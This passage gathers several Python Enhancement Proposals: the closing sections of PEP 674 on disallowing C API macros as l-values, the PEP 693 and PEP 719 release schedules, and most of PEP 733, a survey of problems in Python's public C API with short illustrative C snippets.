In October 2022, Python 3.11 got released with Py_TYPE() and Py_SIZE()
incompatible changes.
Backwards Compatibility
The proposed C API changes are backward incompatible on purpose.
In practice, only Py_TYPE() and Py_SIZE() macros are used as
l-values.
This change does not follow the PEP 387 deprecation process. There is
no known way to emit a deprecation warning only when a macro is used as
an l-value, but not when it’s used differently (ex: as a r-value).
The following 4 macros are left unchanged to reduce the number of
affected projects: PyDescr_NAME(), PyDescr_TYPE(),
PyList_GET_ITEM() and PyTuple_GET_ITEM().
Statistics
In total (projects on PyPI and not on PyPI), 34 projects are known to be
affected by this PEP:
16 projects (47%) are already fixed
18 projects (53%) are not fixed yet
(pending fix or have to regenerate their Cython code)
On September 1, 2022, the PEP affects 18 projects (0.4%) of the top 5000
PyPI projects:
15 projects (0.3%) have to regenerate their Cython code
3 projects (0.1%) have a pending fix
Top 5000 PyPI
Projects with a pending fix (3):
datatable (1.0.0):
fixed
guppy3 (3.1.2):
fixed
scipy (1.9.3): need to update boost python
Moreover, 15 projects have to regenerate their Cython code.
Projects released with a fix (12):
bitarray (1.6.2):
commit
Cython (0.29.20): commit
immutables (0.15):
commit
mercurial (5.7):
commit,
bug report
mypy (v0.930):
commit
numpy (1.22.1):
commit,
commit 2
pycurl (7.44.1):
commit
PyGObject (3.42.0)
pyside2 (5.15.1):
bug report
python-snappy (0.6.1):
fixed
recordclass (0.17.2):
fixed
zstd (1.5.0.3):
commit
There are also two backport projects which are affected by this PEP:
pickle5 (0.0.12): backport for Python <= 3.7
pysha3 (1.0.2): backport for Python <= 3.5
They must not be used and cannot be used on Python 3.11.
Other affected projects
Other projects released with a fix (4):
boost (1.78.0):
commit
breezy (3.2.1):
bug report
duplicity (0.8.18):
commit
gobject-introspection (1.70.0):
MR
Relationship with the HPy project
The HPy project
The hope with the HPy project is to provide a C API that is close
to the original API—to make porting easy—and have it perform as close to
the existing API as possible. At the same time, HPy is sufficiently
removed to be a good “C extension API” (as opposed to a stable subset of
the CPython implementation API) that does not leak implementation
details. To ensure this latter property, the HPy project tries to
develop everything in parallel for CPython, PyPy, and GraalVM Python.
HPy is still evolving very fast. Issues are still being solved while
migrating NumPy, and work has begun on adding support for HPy to Cython. Work on
pybind11 is starting soon. Tim Felgentreff believes by the time HPy has
these users of the existing C API working, HPy should be in a state
where it is generally useful and can be deemed stable enough that
further development can follow a more stable process.
In the long run the HPy project would like to become a promoted API to
write Python C extensions.
The HPy project is a good solution for the long term. It has the
advantage of being developed outside Python and it doesn’t require any C
API change.
The C API is here to stay for a few more years
The first concern about HPy is that right now, HPy is not mature nor
widely used, and CPython still has to continue supporting a large number
of C extensions which are not likely to be ported to HPy soon.
The second concern is the inability to evolve CPython internals to
implement new optimizations, and the inefficient implementation of the
current C API in PyPy, GraalPython, etc. Sadly, HPy will only solve
these problems when most C extensions will be fully ported to HPy:
when it will become reasonable to consider dropping the “legacy” Python
C API.
While porting a C extension to HPy can be done incrementally on CPython,
it requires modifying a lot of code and takes time. Porting most C
extensions to HPy is expected to take a few years.
This PEP proposes to make the C API “less bad” by fixing one problem
which is clearly identified as causing practical issues: macros used as
l-values. This PEP only requires updating a minority of C
extensions, and usually only a few lines need to be changed in impacted
extensions.
For example, NumPy 1.22 is made of 307,300 lines of C code, and adapting
NumPy to this PEP only required modifying 11 lines (to use Py_SET_TYPE and
Py_SET_SIZE) and adding 4 lines (to define Py_SET_TYPE and Py_SET_SIZE
for Python 3.8 and older). The beginnings of the NumPy port to HPy
already required modifying more lines than that.
Right now, it’s hard to bet which approach is the best: fixing the
current C API, or focusing on HPy. It would be risky to only focus on
HPy.
Rejected Idea: Leave the macros as they are
The documentation of each function can discourage developers from using
macros to modify Python objects.
If there is a need to make an assignment, a setter function can be added
and the macro documentation can require using the setter function. For
example, a Py_SET_TYPE() function has been added to Python 3.9 and
the Py_TYPE() documentation now requires using the
Py_SET_TYPE() function to set an object type.
If developers use macros as an l-value, it’s their responsibility when
their code breaks, not Python’s responsibility. We are operating under
the consenting adults principle: we expect users of the Python C API to
use it as documented and expect them to take care of the fallout, if
things break when they don’t.
This idea was rejected because only a few developers read the
documentation, and only a minority track changes to the Python C
API documentation. The majority of developers are only using CPython and
so are not aware of compatibility issues with other Python
implementations.
Moreover, continuing to allow using macros as an l-value does not help
the HPy project, and leaves the burden of emulating them on GraalVM’s
Python implementation.
Macros already modified
The following C API macros have already been modified to disallow using
them as l-value:
PyCell_SET()
PyList_SET_ITEM()
PyTuple_SET_ITEM()
Py_REFCNT() (Python 3.10): Py_SET_REFCNT() must be used
_PyGCHead_SET_FINALIZED()
_PyGCHead_SET_NEXT()
asdl_seq_GET()
asdl_seq_GET_UNTYPED()
asdl_seq_LEN()
asdl_seq_SET()
asdl_seq_SET_UNTYPED()
For example, PyList_SET_ITEM(list, 0, item) < 0 now fails with a
compiler error as expected.
Post History
PEP 674 “Disallow using macros as l-values” and Python 3.11 (August 18, 2022)
SC reply to PEP 674 – Disallow using macros as l-values (February 22, 2022)
PEP 674: Disallow using macros as l-value (version 2)
(Jan 18, 2022)
PEP 674: Disallow using macros as l-value
(Nov 30, 2021)
References
Python C API: Add functions to access PyObject (October
2021) article by Victor Stinner
[capi-sig] Py_TYPE() and Py_SIZE() become static inline functions
(September 2021)
[C API] Avoid accessing PyObject and PyVarObject members directly: add Py_SET_TYPE() and Py_IS_TYPE(), disallow Py_TYPE(obj)=type (February 2020)
bpo-30459: PyList_SET_ITEM could be safer (May 2017)
Version History
Version 3: No longer change PyDescr_TYPE() and PyDescr_NAME() macros
Version 2: Add “Relationship with the HPy project” section, remove
the PyPy section
Version 1: First public version
Copyright
This document is placed in the public domain or under the
CC0-1.0-Universal license, whichever is more permissive.
| Deferred | PEP 674 – Disallow using macros as l-values | Standards Track | Disallow using macros as l-values. For example,
Py_TYPE(obj) = new_type now fails with a compiler error. |
PEP 693 – Python 3.12 Release Schedule
Author:
Thomas Wouters <thomas at python.org>
Status:
Active
Type:
Informational
Topic:
Release
Created:
24-May-2022
Python-Version:
3.12
Table of Contents
Abstract
Release Manager and Crew
Release Schedule
3.12.0 schedule
Bugfix releases
Source-only security fix releases
3.12 Lifespan
Features for 3.12
Copyright
Abstract
This document describes the development and release schedule for
Python 3.12.
Release Manager and Crew
3.12 Release Manager: Thomas Wouters
Windows installers: Steve Dower
Mac installers: Ned Deily
Documentation: Julien Palard
Release Schedule
3.12.0 schedule
Note: the dates below use a 17-month development period that results
in a 12-month release cadence between feature versions, as defined by
PEP 602.
Actual:
3.12 development begins: Sunday, 2022-05-08
3.12.0 alpha 1: Monday, 2022-10-24
3.12.0 alpha 2: Monday, 2022-11-14
3.12.0 alpha 3: Tuesday, 2022-12-06
3.12.0 alpha 4: Tuesday, 2023-01-10
3.12.0 alpha 5: Tuesday, 2023-02-07
3.12.0 alpha 6: Tuesday, 2023-03-07
3.12.0 alpha 7: Tuesday, 2023-04-04
3.12.0 beta 1: Monday, 2023-05-22
(No new features beyond this point.)
3.12.0 beta 2: Tuesday, 2023-06-06
3.12.0 beta 3: Monday, 2023-06-19
3.12.0 beta 4: Tuesday, 2023-07-11
3.12.0 candidate 1: Sunday, 2023-08-06
3.12.0 candidate 2: Wednesday, 2023-09-06
3.12.0 candidate 3: Tuesday, 2023-09-19
3.12.0 final: Monday, 2023-10-02
Bugfix releases
Actual:
3.12.1: Thursday, 2023-12-07
Expected:
3.12.2: Tuesday, 2024-02-06
3.12.3: Tuesday, 2024-04-09
3.12.4: Tuesday, 2024-06-04
3.12.5: Tuesday, 2024-08-06
3.12.6: Tuesday, 2024-10-01
3.12.7: Tuesday, 2024-12-03
3.12.8: Tuesday, 2025-02-04
3.12.9: Tuesday, 2025-04-08
Source-only security fix releases
Provided irregularly on an as-needed basis until October 2028.
3.12 Lifespan
3.12 will receive bugfix updates approximately every 2 months for
approximately 18 months. Some time after the release of 3.13.0 final,
the ninth and final 3.12 bugfix update will be released. After that,
it is expected that security updates (source only) will be released
until 5 years after the release of 3.12.0 final, so until approximately
October 2028.
Features for 3.12
New features can be found in What’s New In Python 3.12.
Copyright
This document is placed in the public domain or under the CC0-1.0-Universal
license, whichever is more permissive.
| Active | PEP 693 – Python 3.12 Release Schedule | Informational | This document describes the development and release schedule for
Python 3.12. |
PEP 719 – Python 3.13 Release Schedule
Author:
Thomas Wouters <thomas at python.org>
Status:
Active
Type:
Informational
Topic:
Release
Created:
26-May-2023
Python-Version:
3.13
Table of Contents
Abstract
Release Manager and Crew
Release Schedule
3.13.0 schedule
3.13 Lifespan
Copyright
Abstract
This document describes the development and release schedule for
Python 3.13.
Release Manager and Crew
3.13 Release Manager: Thomas Wouters
Windows installers: Steve Dower
Mac installers: Ned Deily
Documentation: Julien Palard
Release Schedule
3.13.0 schedule
Note: the dates below use a 17-month development period that results
in a 12-month release cadence between feature versions, as defined by
PEP 602.
Actual:
3.13 development begins: Monday, 2023-05-22
3.13.0 alpha 1: Friday, 2023-10-13
3.13.0 alpha 2: Wednesday, 2023-11-22
3.13.0 alpha 3: Wednesday, 2024-01-17
Expected:
3.13.0 alpha 4: Tuesday, 2024-02-13
3.13.0 alpha 5: Tuesday, 2024-03-12
3.13.0 alpha 6: Tuesday, 2024-04-09
3.13.0 beta 1: Tuesday, 2024-05-07
(No new features beyond this point.)
3.13.0 beta 2: Tuesday, 2024-05-28
3.13.0 beta 3: Tuesday, 2024-06-18
3.13.0 beta 4: Tuesday, 2024-07-16
3.13.0 candidate 1: Tuesday, 2024-07-30
3.13.0 candidate 2: Tuesday, 2024-09-03
3.13.0 final: Tuesday, 2024-10-01
Subsequent bugfix releases every two months.
3.13 Lifespan
3.13 will receive bugfix updates approximately every 2 months for
approximately 24 months. Around the time of the release of 3.15.0 final, the
final 3.13 bugfix update will be released. After that, it is expected that
security updates (source only) will be released until 5 years after the
release of 3.13.0 final, so until approximately October 2029.
Copyright
This document is placed in the public domain or under the CC0-1.0-Universal
license, whichever is more permissive.
| Active | PEP 719 – Python 3.13 Release Schedule | Informational | This document describes the development and release schedule for
Python 3.13. |
PEP 733 – An Evaluation of Python’s Public C API
Author:
Erlend Egeberg Aasland <erlend at python.org>,
Domenico Andreoli <domenico.andreoli at linux.com>,
Stefan Behnel <stefan_ml at behnel.de>,
Carl Friedrich Bolz-Tereick <cfbolz at gmx.de>,
Simon Cross <hodgestar at gmail.com>,
Steve Dower <steve.dower at python.org>,
Tim Felgentreff <tim.felgentreff at oracle.com>,
David Hewitt <1939362+davidhewitt at users.noreply.github.com>,
Shantanu Jain <hauntsaninja at gmail.com>,
Wenzel Jakob <wenzel.jakob at epfl.ch>,
Irit Katriel <irit at python.org>,
Marc-Andre Lemburg <mal at lemburg.com>,
Donghee Na <donghee.na at python.org>,
Karl Nelson <nelson85 at llnl.gov>,
Ronald Oussoren <ronaldoussoren at mac.com>,
Antoine Pitrou <solipsis at pitrou.net>,
Neil Schemenauer <nas at arctrix.com>,
Mark Shannon <mark at hotpy.org>,
Stepan Sindelar <stepan.sindelar at oracle.com>,
Gregory P. Smith <greg at krypto.org>,
Eric Snow <ericsnowcurrently at gmail.com>,
Victor Stinner <vstinner at python.org>,
Guido van Rossum <guido at python.org>,
Petr Viktorin <encukou at gmail.com>,
Carol Willing <willingc at gmail.com>,
William Woodruff <william at yossarian.net>,
David Woods <dw-git at d-woods.co.uk>,
Jelle Zijlstra <jelle.zijlstra at gmail.com>
Status:
Draft
Type:
Informational
Created:
16-Oct-2023
Post-History:
01-Nov-2023
Table of Contents
Abstract
Introduction
C API Stakeholders
Common Actions for All Stakeholders
Extension Writers
Authors of Embedded Python Applications
Python Implementations
Alternative APIs and Binding Generators
Strengths of the C API
C API problems
API Evolution and Maintenance
API Specification and Abstraction
Object Reference Management
Type Definition and Object Creation
Error Handling
API Tiers and Stability Guarantees
Use of the C Language
Implementation Flaws
Missing Functionality
Debug Mode
Introspection
Improved Interaction with Other Languages
References
Copyright
Abstract
This informational PEP describes our shared view of the public C API. The
document defines:
purposes of the C API
stakeholders and their particular use cases and requirements
strengths of the C API
problems of the C API categorized into nine areas of weakness
This document does not propose solutions to any of the identified problems. By
creating a shared list of C API issues, this document will help to guide
continuing discussion about change proposals and to identify evaluation
criteria.
Introduction
Python’s C API was not designed for the different purposes it currently
fulfills. It evolved from what was initially the internal API between
the C code of the interpreter and the Python language and libraries.
In its first incarnation, it was exposed to make it possible to embed
Python into C/C++ applications and to write extension modules in C/C++.
These capabilities were instrumental to the growth of Python’s ecosystem.
Over the decades, the C API grew to provide different tiers of stability,
conventions changed, and new usage patterns have emerged, such as bindings
to languages other than C/C++. In the next few years, new developments
are expected to further test the C API, such as the removal of the GIL
and the development of a JIT compiler. However, this growth was not
supported by clearly documented guidelines, resulting in inconsistent
approaches to API design in different subsystems of CPython. In addition,
CPython is no longer the only implementation of Python, and some of the
design decisions made when it was the only one are difficult for alternative
implementations to work with
[Issue 64].
In the meantime, lessons were learned and mistakes in both the design
and the implementation of the C API were identified.
Evolving the C API is hard due to the combination of backwards
compatibility constraints and its inherent complexity, both
technical and social. Different types of users bring different,
sometimes conflicting, requirements. The tradeoff between stability
and progress is an ongoing, highly contentious topic of discussion
when suggestions are made for incremental improvements.
Several proposals have been put forward for improvement, redesign
or replacement of the C API, each representing a deep analysis of
the problems. At the 2023 Language Summit, three back-to-back
sessions were devoted to different aspects of the C API. There is
general agreement that a new design can remedy the problems that
the C API has accumulated over the last 30 years, while at the
same time updating it for use cases that it was not originally
designed for.
However, there was also a sense at the Language Summit that we are
trying to discuss solutions without a clear common understanding
of the problems that we are trying to solve. We decided that
we need to agree on the current problems with the C API, before
we are able to evaluate any of the proposed solutions. We
therefore created the
capi-workgroup
repository on GitHub in order to collect everyone’s ideas on that
question.
Over 60 different issues were created on that repository, each
describing a problem with the C API. We categorized them and
identified a number of recurring themes. The sections below
mostly correspond to these themes, and each contains a combined
description of the issues raised in that category, along with
links to the individual issues. In addition, we included a section
that aims to identify the different stakeholders of the C API,
and the particular requirements that each of them has.
C API Stakeholders
As mentioned in the introduction, the C API was originally
created as the internal interface between CPython’s
interpreter and the Python layer. It was later exposed as
a way for third-party developers to extend and embed Python
programs. Over the years, new types of stakeholders emerged,
with different requirements and areas of focus. This section
describes this complex state of affairs in terms of the
actions that different stakeholders need to perform through
the C API.
Common Actions for All Stakeholders
There are actions which are generic, and required by
all types of API users:
Define functions and call them
Define new types
Create instances of builtin and user-defined types
Perform operations on object instances
Introspect objects, including types, instances, and functions
Raise and handle exceptions
Import modules
Access to Python’s OS interface
The following sections look at the unique requirements of various stakeholders.
Extension Writers
Extension writers are the traditional users of the C API. Their requirements
are the common actions listed above. They also commonly need to:
Create new modules
Efficiently interface between modules at the C level
Authors of Embedded Python Applications
These are applications with an embedded Python interpreter. Examples are
Blender and
OBS.
They need to be able to:
Configure the interpreter (import paths, inittab, sys.argv, memory
allocator, etc.).
Interact with the execution model and program lifetime, including
clean interpreter shutdown and restart.
Represent complex data models in a way Python can use without
having to create deep copies.
Provide and import frozen modules.
Run and manage multiple independent interpreters (in particular, when
embedded in a library that wants to avoid global effects).
Python Implementations
Python implementations such as
CPython,
PyPy,
GraalPy,
IronPython,
RustPython,
MicroPython,
and Jython, may take
very different approaches for the implementation of
different subsystems. They need:
The API to be abstract and hide implementation details.
A specification of the API, ideally with a test suite
that ensures compatibility.
It would be nice to have an ABI that can be shared
across Python implementations.
Alternative APIs and Binding Generators
There are several projects that implement alternatives to the
C API, which offer extension users advantages over programming
directly with the C API. These APIs are implemented with the
C API, and in some cases by using CPython internals.
There are also libraries that create bindings between Python and
other object models, paradigms or languages.
There is overlap between these categories: binding generators
usually provide alternative APIs, and vice versa.
Examples are
Cython,
cffi,
pybind11 and
nanobind for C++,
PyO3 for Rust,
Shiboken used by
PySide for Qt,
PyGObject for GTK,
Pygolo for Go,
JPype for Java,
PyJNIus for Android,
PyObjC for Objective-C,
SWIG for C/C++,
Python.NET for .NET (C#),
HPy,
Mypyc,
Pythran and
pythoncapi-compat.
CPython’s DSL for parsing function arguments, the
Argument Clinic,
can also be seen as belonging to this category of stakeholders.
Alternative APIs need minimal building blocks for accessing CPython
efficiently. They don’t necessarily need an ergonomic API, because
they typically generate code that is not intended to be read
by humans. But they do need it to be comprehensive enough so that
they can avoid accessing internals, without sacrificing performance.
Binding generators often need to:
Create custom objects (e.g. function/module objects
and traceback entries) that match the behavior of equivalent
Python code as closely as possible.
Dynamically create objects which are static in traditional
C extensions (e.g. classes/modules), and need CPython to manage
their state and lifetime.
Dynamically adapt foreign objects (strings, GC’d containers), with
low overhead.
Adapt external mechanisms, execution models and guarantees to the
Python way (stackful coroutines, continuations,
one-writer-or-multiple-readers semantics, virtual multiple inheritance,
1-based indexing, super-long inheritance chains, goroutines, channels,
etc.).
These tools might also benefit from a choice between a more stable
and a faster (possibly lower-level) API. Their users could
then decide whether they can afford to regenerate the code often or
trade some performance for more stability and less maintenance work.
Strengths of the C API
While the bulk of this document is devoted to problems with the
C API that we would like to see fixed in any new design, it is
also important to point out the strengths of the C API, and to
make sure that they are preserved.
As mentioned in the introduction, the C API enabled the
development and growth of the Python ecosystem over the last
three decades, while evolving to support use cases that it was
not originally designed for. This track record in itself is
an indication of how effective and valuable it has been.
A number of specific strengths were mentioned in the
capi-workgroup discussions. Heap types were identified
as much safer and easier to use than static types
[Issue 4].
API functions that take a C string literal for lookups based
on a Python string are very convenient
[Issue 30].
The limited API demonstrates that an API which hides implementation
details makes it easier to evolve Python
[Issue 30].
C API problems
The remainder of this document summarizes and categorizes the problems that were reported on
the capi-workgroup repository.
The issues are grouped into several categories.
API Evolution and Maintenance
The difficulty of making changes in the C API is central to this report. It is
implicit in many of the issues we discuss here, particularly when we need to
decide whether an incremental bugfix can resolve the issue, or whether it can
only be addressed as part of an API redesign
[Issue 44]. The
benefit of each incremental change is often viewed as too small to justify the
disruption. Over time, this implies that every mistake we make in an API’s
design or implementation remains with us indefinitely.
We can take two views on this issue. One is that this is a problem and the
solution needs to be baked into any new C API we design, in the form of a
process for incremental API evolution, which includes deprecation and
removal of API elements. The other possible approach is that this is not
a problem to be solved, but rather a feature of any API. In this
view, API evolution should not be incremental, but rather through large
redesigns, each of which learns from the mistakes of the past and is not
shackled by backwards compatibility requirements (in the meantime, new
API elements may be added, but nothing can ever be removed). A compromise
approach is somewhere between these two extremes, fixing issues which are
easy or important enough to tackle incrementally, and leaving others alone.
The problem we have in CPython is that we don’t have an agreed, official
approach to API evolution. Different members of the core team are pulling in
different directions and this is an ongoing source of disagreements.
Any new C API needs to come with a clear decision about the model
that its maintenance will follow, as well as the technical and
organizational processes by which this will work.
If the model does include provisions for incremental evolution of the API,
it will include processes for managing the impact of the change on users
[Issue 60],
perhaps through introducing an external backwards compatibility module
[Issue 62],
or a new API tier of “blessed” functions
[Issue 55].
API Specification and Abstraction
The C API does not have a formal specification; it is currently defined
as whatever the reference implementation (CPython) contains in a
particular version. The documentation acts as an incomplete description,
which is not sufficient for verifying the correctness of either the full
API, the limited API, or the stable ABI. As a result, the C API may
change significantly between releases without needing a more visible
specification update, and this leads to a number of problems.
Bindings for languages other than C/C++ must parse C code
[Issue 7].
Some C language features are hard to handle in this way, because
they produce compiler-dependent output (such as enums) or require
a C preprocessor/compiler rather than just a parser (such as macros)
[Issue 35].
Furthermore, C header files tend to expose more than what is intended
to be part of the public API
[Issue 34].
In particular, implementation details such as the precise memory
layouts of internal data structures can be exposed
[Issue 22
and PEP 620].
This can make API evolution very difficult, in particular when it
occurs in the stable ABI as in the case of ob_refcnt and ob_type,
which are accessed via the reference counting macros
[Issue 45].
We identified a deeper issue in relation to the way that reference
counting is exposed. The way that C extensions are required to
manage references with calls to Py_INCREF and Py_DECREF is
specific to CPython’s memory model, and is hard for alternative
Python implementations to emulate.
[Issue 12].
Another set of problems arises from the fact that a PyObject* is
exposed in the C API as an actual pointer rather than a handle. The
address of an object serves as its ID and is used for comparison,
and this complicates matters for alternative Python implementations
that move objects during GC
[Issue 37].
A separate issue is that object references are opaque to the runtime,
discoverable only through calls to tp_traverse/tp_clear,
which have their own purposes. If there was a way for the runtime to
know the structure of the object graph, and keep up with changes in it,
this would make it possible for alternative implementations to implement
different memory management schemes
[Issue 33].
Object Reference Management
There is no consistent naming convention that makes the reference
semantics of functions obvious, so the C API is error prone
wherever a function does not follow the typical
behaviour. When a C API function returns a PyObject*, the
caller typically gains ownership of a reference to the object.
However, there are exceptions where a function returns a
“borrowed” reference, which the caller can access but does not own
a reference to. Similarly, functions typically do not change the
ownership of references to their arguments, but there are
exceptions where a function “steals” a reference, i.e., the
ownership of the reference is permanently transferred from the
caller to the callee by the call
[Issue 8
and Issue 52].
The terminology used to describe these situations in the documentation
can also be improved
[Issue 11].
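For illustration, here is a minimal sketch (not taken from the PEP, with a made-up function name) that contrasts the two conventions: PyList_Append follows the usual rules, while PyTuple_SetItem steals the caller's reference.

#include <Python.h>

/* Sketch only: contrast a stealing call with a non-stealing one. */
static PyObject *
ownership_example(void)
{
    PyObject *tup = PyTuple_New(1);
    PyObject *lst = PyList_New(0);
    PyObject *num = PyLong_FromLong(42);   /* we own this reference */
    if (tup == NULL || lst == NULL || num == NULL) {
        Py_XDECREF(tup);
        Py_XDECREF(lst);
        Py_XDECREF(num);
        return NULL;
    }
    /* PyList_Append does NOT steal: we still own `num` afterwards. */
    if (PyList_Append(lst, num) < 0) {
        Py_DECREF(tup);
        Py_DECREF(lst);
        Py_DECREF(num);
        return NULL;
    }
    /* PyTuple_SetItem DOES steal: ownership of `num` passes to the tuple,
       so we must not Py_DECREF it again ourselves. */
    PyTuple_SetItem(tup, 0, num);
    Py_DECREF(lst);   /* done with the list; its own item reference goes with it */
    return tup;
}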
A more radical change is necessary in the case of functions that
return “borrowed” references (such as PyList_GetItem)
[Issue 5 and
Issue 21]
or pointers to parts of the internal structure of an object
(such as PyBytes_AsString)
[Issue 57].
In both cases, the reference/pointer is valid for as long as the
owning object holds the reference, but this time is hard to reason about.
Such functions should not exist in the API without a mechanism that can
make them safe.
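As a rough sketch (not from the PEP; the helper name is invented), this is how a caller currently has to handle such a borrowed reference if the item must stay valid while other code runs:

#include <Python.h>

/* Sketch only: a borrowed reference is valid only while the list keeps
   the item alive, so take an owned reference before doing anything that
   might mutate or release the list. */
static long
first_item_as_long(PyObject *list)
{
    PyObject *item = PyList_GetItem(list, 0);   /* borrowed reference */
    if (item == NULL) {
        return -1;                              /* exception already set */
    }
    Py_INCREF(item);                            /* now we own it */
    long value = PyLong_AsLong(item);
    Py_DECREF(item);
    return value;   /* -1 with an exception set if the conversion failed */
}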
For containers, the API is currently missing bulk operations on the
references of contained objects. This is particularly important for
a stable ABI where INCREF and DECREF cannot be macros, making
bulk operations expensive when implemented as a sequence of function
calls
[Issue 15].
Type Definition and Object Creation
The C API has functions that make it possible to create incomplete
or inconsistent Python objects, such as PyTuple_New and
PyUnicode_New. This causes problems when the object is tracked
by GC or its tp_traverse/tp_clear functions are called.
A related issue is with functions such as PyTuple_SetItem
which is used to modify a partially initialized tuple (tuples
are immutable once fully initialized)
[Issue 56].
We identified a few issues with type definition APIs. For legacy
reasons, there is often a significant amount of code duplication
between tp_new and tp_vectorcall
[Issue 24].
Type slot functions should be called indirectly, so that their
signatures can change to include context information
[Issue 13].
Several aspects of the type definition and creation process are not
well defined, such as which stage of the process is responsible for
initializing and clearing different fields of the type object
[Issue 49].
Error Handling
Error handling in the C API is based on the error indicator which is stored
on the thread state (in global scope). The design intention was that each
API function returns a value indicating whether an error has occurred (by
convention, -1 or NULL). When the program knows that an error
occurred, it can fetch the exception object which is stored in the
error indicator. We identified a number of problems which are related
to error handling, pointing at APIs which are too easy to use incorrectly.
There are functions that do not report all errors that occur while they
execute. For example, PyDict_GetItem clears any errors that occur
when it calls the key’s hash function, or while performing a lookup
in the dictionary
[Issue 51].
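For contrast, a short sketch (not from the PEP; the wrapper name is invented) of the existing PyDict_GetItemWithError variant, which does report such errors at the cost of a more involved calling pattern:

#include <Python.h>

/* Sketch only: distinguish "key absent" from "an error occurred". */
static PyObject *
lookup(PyObject *dict, PyObject *key)
{
    PyObject *value = PyDict_GetItemWithError(dict, key);  /* borrowed */
    if (value == NULL) {
        if (PyErr_Occurred()) {
            return NULL;                 /* e.g. the key's __hash__ raised */
        }
        PyErr_SetObject(PyExc_KeyError, key);
        return NULL;                     /* key simply not present */
    }
    Py_INCREF(value);                    /* convert to an owned reference */
    return value;
}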
Python code never executes with an in-flight exception (by definition),
and typically code using native functions should also be interrupted by
an error being raised. This is not checked in most C API functions, and
there are places in the interpreter where error handling code calls a C API
function while an exception is set. For example, see the call to
PyUnicode_FromString in the error handler of _PyErr_WriteUnraisableMsg
[Issue 2].
There are functions that do not return a value, so a caller is forced to
query the error indicator in order to identify whether an error has occurred.
An example is PyBuffer_Release
[Issue 20].
There are other functions which do have a return value, but this return value
does not unambiguously indicate whether an error has occurred. For example,
PyLong_AsLong returns -1 in case of error, or when the value of the
argument is indeed -1
[Issue 1].
In both cases, the API is error prone because it is possible that the
error indicator was already set before the function was called, and the
error is incorrectly attributed. The fact that the error was not detected
before the call is a bug in the calling code, but the behaviour of the
program in this case doesn’t make it easy to identify and debug the
problem.
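A brief sketch (not from the PEP; get_long is a made-up helper) of the disambiguation that callers currently have to perform:

#include <assert.h>
#include <Python.h>

/* Sketch only: -1 is both a legal result and the error marker, so the
   caller must consult the error indicator, and must be sure it was
   clear before the call or the error will be misattributed. */
static int
get_long(PyObject *obj, long *out)
{
    assert(!PyErr_Occurred());
    long value = PyLong_AsLong(obj);
    if (value == -1 && PyErr_Occurred()) {
        return -1;              /* a real error, not the value -1 */
    }
    *out = value;
    return 0;
}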
There are functions that take a PyObject* argument, with special meaning
when it is NULL. For example, if PyObject_SetAttr receives NULL as
the value to set, this means that the attribute should be cleared. This is error
prone because it could be that NULL indicates an error in the construction
of the value, and the program failed to check for this error. The program will
misinterpret the NULL to mean something different than error
[Issue 47].
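A short sketch (not from the PEP; set_name is a made-up helper) showing how the missing NULL check would silently turn a construction failure into an attribute deletion:

#include <Python.h>

/* Sketch only: if the NULL check below were omitted, a failure in
   PyUnicode_FromString would be reinterpreted by
   PyObject_SetAttrString as "delete the attribute". */
static int
set_name(PyObject *obj, const char *text)
{
    PyObject *value = PyUnicode_FromString(text);
    if (value == NULL) {
        return -1;
    }
    int result = PyObject_SetAttrString(obj, "name", value);
    Py_DECREF(value);
    return result;
}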
API Tiers and Stability Guarantees
The different API tiers provide different tradeoffs of stability vs
API evolution, and sometimes performance.
The stable ABI was identified as an area that needs to be looked into. At
the moment it is incomplete and not widely adopted. At the same time, its
existence is making it hard to make changes to some implementation
details, because it exposes struct fields such as ob_refcnt,
ob_type and ob_size. There was some discussion about whether
the stable ABI is worth keeping. Arguments on both sides can be
found in [Issue 4]
and [Issue 9].
Alternatively, it was suggested that in order to be able to evolve
the stable ABI, we need a mechanism to support multiple versions of
it in the same Python binary. It was pointed out that versioning
individual functions within a single ABI version is not enough
because it may be necessary to evolve, together, a group of functions
that interoperate with each other
[Issue 39].
The limited API was introduced in 3.2 as a blessed subset of the C API
which is recommended for users who would like to restrict themselves
to high quality APIs which are not likely to change often. The
Py_LIMITED_API flag allows users to restrict their program to older
versions of the limited API, but we now need the opposite option, to
exclude older versions. This would make it possible to evolve the
limited API by replacing flawed elements in it
[Issue 54].
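For reference, a minimal sketch of how the existing flag is used today; the version number shown (3.9) is only an example:

/* Sketch only: opt in to the limited API as it existed in Python 3.9,
   so the resulting extension can target the abi3 stable ABI. */
#define Py_LIMITED_API 0x03090000
#include <Python.h>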
More generally, in a redesign we should revisit the way that API
tiers are specified and consider designing a method that will unify the
way we currently select between the different tiers
[Issue 59].
API elements whose names begin with an underscore are considered
private, essentially an API tier with no stability guarantees.
However, this was only clarified recently, in PEP 689. It is
not clear what the change policy should be with respect to such
API elements that predate PEP 689
[Issue 58].
There are API functions which have an unsafe (but fast) version as well as
a safe version which performs error checking (for example,
PyTuple_GET_ITEM vs PyTuple_GetItem). It may help to
be able to group them into their own tiers - the “unsafe API” tier and
the “safe API” tier
[Issue 61].
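A small sketch (not from the PEP; the helper name is invented) of the difference between the two:

#include <Python.h>

/* Sketch only: the macro does no checking at all, while the function
   validates its arguments and reports failure via an exception. */
static PyObject *
get_first(PyObject *tuple)
{
    PyObject *fast = PyTuple_GET_ITEM(tuple, 0);  /* no type or bounds check */
    PyObject *safe = PyTuple_GetItem(tuple, 0);   /* NULL + exception on error */
    (void)fast;
    return safe;                                  /* both are borrowed references */
}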
Use of the C Language
A number of issues were raised with respect to the way that CPython
uses the C language. First there is the issue of which C dialect
we use, and how we test our compatibility with it, as well as API
header compatibility with C++ dialects
[Issue 42].
Usage of const in the API is currently sparse, but it is not
clear whether this is something that we should consider changing
[Issue 38].
We currently use the C types long and int, where fixed-width integers
such as int32_t and int64_t may now be better choices
[Issue 27].
We are using C language features which are hard for other languages
to interact with, such as macros, variadic arguments, enums, bitfields,
and non-function symbols
[Issue 35].
There are API functions that take a PyObject* arg which must be
of a more specific type (such as PyTuple_Size, which fails if
its arg is not a PyTupleObject*). It is an open question whether this
is a good pattern to have, or whether the API should expect the
more specific type
[Issue 31].
There are functions in the API that take concrete types, such as
PyDict_GetItemString which performs a dictionary lookup for a key
specified as a C string rather than PyObject*. At the same time,
for PyDict_ContainsString it is not considered appropriate to
add a concrete type alternative. The principle around this should
be documented in the guidelines
[Issue 23].
Implementation Flaws
Below is a list of localized implementation flaws. Most of these can
probably be fixed incrementally, if we choose to do so. They should,
in any case, be avoided in any new API design.
There are functions that don’t follow the convention of
returning 0 for success and -1 for failure. For
example, PyArg_ParseTuple returns a non-zero value for success and
0 for failure
[Issue 25].
The macros Py_CLEAR and Py_SETREF access their arg more than
once, so if the arg is an expression with side effects, they are
